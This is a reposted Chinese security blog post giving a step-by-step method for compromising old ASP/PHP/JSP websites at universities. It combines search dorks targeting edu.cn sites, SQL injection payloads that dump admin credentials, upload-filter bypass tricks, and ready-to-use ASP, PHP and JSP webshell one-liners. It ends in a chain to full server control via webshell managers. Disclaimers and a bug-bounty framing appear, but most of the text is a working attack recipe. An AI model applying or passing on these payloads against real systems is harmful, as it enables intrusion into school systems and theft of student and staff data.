文章总结: 本文针对教育系统老旧网站(ASP/PHP/JSP)的漏洞挖掘提出组合攻击方案,核心思路是通过SQL注入获取后台权限后结合文件上传漏洞直接获取服务器控制权。文章详细介绍了不同语言环境的注入检测方法、常见上传点定位技巧以及绕过安全防护的具体Payload,强调此类系统因缺乏维护存在极高安全风险。作者同时提醒需在授权测试范围内使用技术并遵守网络安全法。
综合评分: 78
文章分类: 渗透测试,WEB安全,漏洞分析,实战经验,安全工具
edu–老旧系统(ASP/PHP/JSP)注入 + 上传实战
原创
混饭吃的混子
混饭吃的混子
什么安全Sec
2026年4月1日 11:08
四川
在小说阅读器读本章
去阅读
[免责声明]
请勿利用文章内的相关技术从事非法测试,由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本公众号及作者不为此承担任何责任,一旦造成后果请自行承担!
适用场景:高校官网、教务系统、图书馆、一卡通、老旧管理后台(90% 为 ASP/PHP5/JSP 无维护老站)
核心思路:先找注入拿权限 / 路径,再抓上传点绕 WAF,组合拳直接高危
环境说明:仅用于授权测试,请勿非法攻击,遵守《网络安全法》
一、开篇:edu 老旧系统为什么 “必出洞”?
高校 80% 的业务系统都是 10 年 + 遗留资产:
- 1.无更新:ASP/PHP5.2-5.4/JSP 老框架,无补丁、无防护;
- 2.弱防护:仅装基础安全狗 / D 盾 / 云盾,规则老旧好绕过;
- 3.逻辑烂:上传不校验、SQL 直接拼接、权限不控制;只要找到 “注入 + 上传” 组合,必是高危,不用碰内网、不用复杂提权,外网直接打穿。
二、第一步:快速定位目标(30 秒筛出老系统)
优先搜这几类关键词(教育网专属):
高校 教务管理 / 成绩查询 / 图书管理 / 缴费系统 / 后勤管理site:edu.cn inurl:asp asp?id= php?id= jsp?id=
site:edu.cn inurl:asp?id=site:edu.cn inurl:php?id=site:edu.cn inurl:jsp?id=关键词:教务、图书、成绩、缴费、后勤、管理系统
判断标准:页面报错显示 ASP.NET/PHP Version/Tomcat、UI 复古、链接带 ?id=/?xx= 90% 有注入。
三、分语言注入实战(ASP/PHP/JSP 通用 Payload)
1. ASP 注入(最常见、最简单)
老 ASP 站几乎无过滤,直接手测:
?id=1' and 1=1-- 正常?id=1' and 1=2-- 报错 → 存在注入
爆库 / 爆表 / 爆字段(ASP+Access 通用):
?id=1' union select 1,2,3,admin,pass from admin--
关键:ASP 老站大多是 Access,直接爆admin表,拿后台账号密码。
2. PHP 注入(PHP5 老站,无预处理)
?id=1' and sleep(5)-- 延时注入?id=1' union select 1,user(),3,4-- 查当前用户
edu 老 PHP 站几乎都不过滤单引号,手测比工具快。
3. JSP 注入(Tomcat 老站,拼接 SQL)
?id=1' or '1'='1?id=1' union select 1,username,password from user--
JSP 注入拿到的多是后台管理员账号,直接进后台找上传。
四、第二步:找上传点(edu 后台必存在的 3 个位置)
注入拿到账号密码后,直接登录后台,上传点 100% 在这:
- 1.新闻编辑 / 公告发布:图片上传、附件上传;
- 2.头像 / 资料修改:个人中心头像上传;
- 3.系统设置:logo 上传、模板上传、备份上传;老系统上传规则:只校验前端、只校验后缀、不校验内容。
#
五、绕 WAF 上传 Shell(稳过安全狗 / D 盾)
1. ASP 大马上传
绕过方式:改后缀 + 改 Content-Type文件名:shell.asp;.jpg、shell.asp%00.jpg数据包:
Content-Disposition: form-data; name="file"; filename="shell.asp"Content-Type: image/jpeg<%eval request("pass")%>
90% ASP 老站直接通杀。
2. PHP 一句话上传
<?PhP EvAl($_POsT[1]);?>
3. JSP 木马上传
<%@ page language="java" %><%Runtime.getRuntime().exec(request.getParameter("cmd"));%>
六、组合拳实战流程
1.扫 edu 域名 → 找到asp?id=1老站;
2.手测注入 → 爆出admin/123456;
3.登录后台 → 找到图片上传;
4.绕上传 → 上传一句话;
5.连接菜刀 / 蚁剑 → 拿下服务器权限;
七、避坑指南
-
不删库、不篡改页面,只验证权限;
-
提交时附:注入 Payload、登录账号、上传过程、Shell 截图;
-
优先选本科 / 专科院校
-
老系统别用扫描器猛扫,容易封 IP,手测最稳。
本文为edu挖掘的进阶续集,后续将持续更新各种edu漏洞,关注收藏,挖洞不迷路!
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:什么安全Sec 混饭吃的混子
混饭吃的混子《edu–老旧系统(ASP/PHP/JSP)注入 + 上传实战》